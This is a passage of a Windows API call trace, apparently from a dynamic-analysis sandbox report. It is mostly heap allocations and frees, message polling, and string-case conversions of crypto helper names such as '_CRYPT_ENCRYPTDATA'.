wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0172.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.666] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0172.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14707) returned 0xa7f018 [0172.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0172.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14707) returned 0x9d9890 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0172.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0172.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.670] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0172.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0172.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0172.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.670] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.671] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0172.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.672] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0172.673] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.674] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0172.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, 